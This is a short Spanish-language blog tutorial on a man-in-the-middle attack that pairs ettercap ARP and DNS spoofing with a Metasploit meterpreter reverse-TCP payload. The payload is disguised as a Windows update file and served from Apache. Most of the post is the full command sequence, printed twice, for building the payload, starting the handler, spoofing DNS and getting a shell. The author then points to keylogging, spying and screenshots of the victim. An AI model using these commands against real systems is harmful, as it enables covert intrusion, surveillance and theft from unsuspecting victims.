Man In The Middle (MITM) Attack : ettercap, metasploit
¿Qué es esto?Con la creación de un sitio Web falso, que con un poco de ingeñieria social obtendriamos el acceso a la línea de comandos para PC nuestro objetivo.
¿Cómo funciona esto?
> Ettercap para realizar el ataque MITM
> Metasploit para la explotación
> Apache para el servidor web
¿Qué necesito?
> Ettercap
> Metasploit
> Servidor Web
Aca va un video:
Attack: Man In The Middle (MITM) | g0tmi1k
Para descargar:
http://www.mediafire.com/?x5xt4nkgjtn
Aca los comandos del video pero mejorado por mi

Citar
#Exploit Reverse Tcp
nano /usr/share/ettercap/etter.dns
sh -c "start-apache"
y si no te funciona tenes
/etc/init.d/apache2 start
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=IP (Internet Protocol) X > /var/www/Windows-KB174529-x86-ENU.exe
,/msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP (Internet Protocol) -ifconfig-
exploit
ettercap -T -Q -P dns_spoof -M arp // // -i eth0
shell
Y ahi después hacen lo que se les cante
keylloger,espia,screenshot y etc....
nano /usr/share/ettercap/etter.dns
sh -c "start-apache"
y si no te funciona tenes
/etc/init.d/apache2 start
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=IP (Internet Protocol) X > /var/www/Windows-KB174529-x86-ENU.exe
,/msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP (Internet Protocol) -ifconfig-
exploit
ettercap -T -Q -P dns_spoof -M arp // // -i eth0
shell
Y ahi después hacen lo que se les cante

keylloger,espia,screenshot y etc....
Fuente: http://forums.remote-exploit.org
PD: Es mi primer tutorial asi que cualquiera error es por ser la primera vez xD, también se puede meter SBD (Secure BackDoor) pero eso ya depende de cada uno

Salu2
No hay comentarios:
Publicar un comentario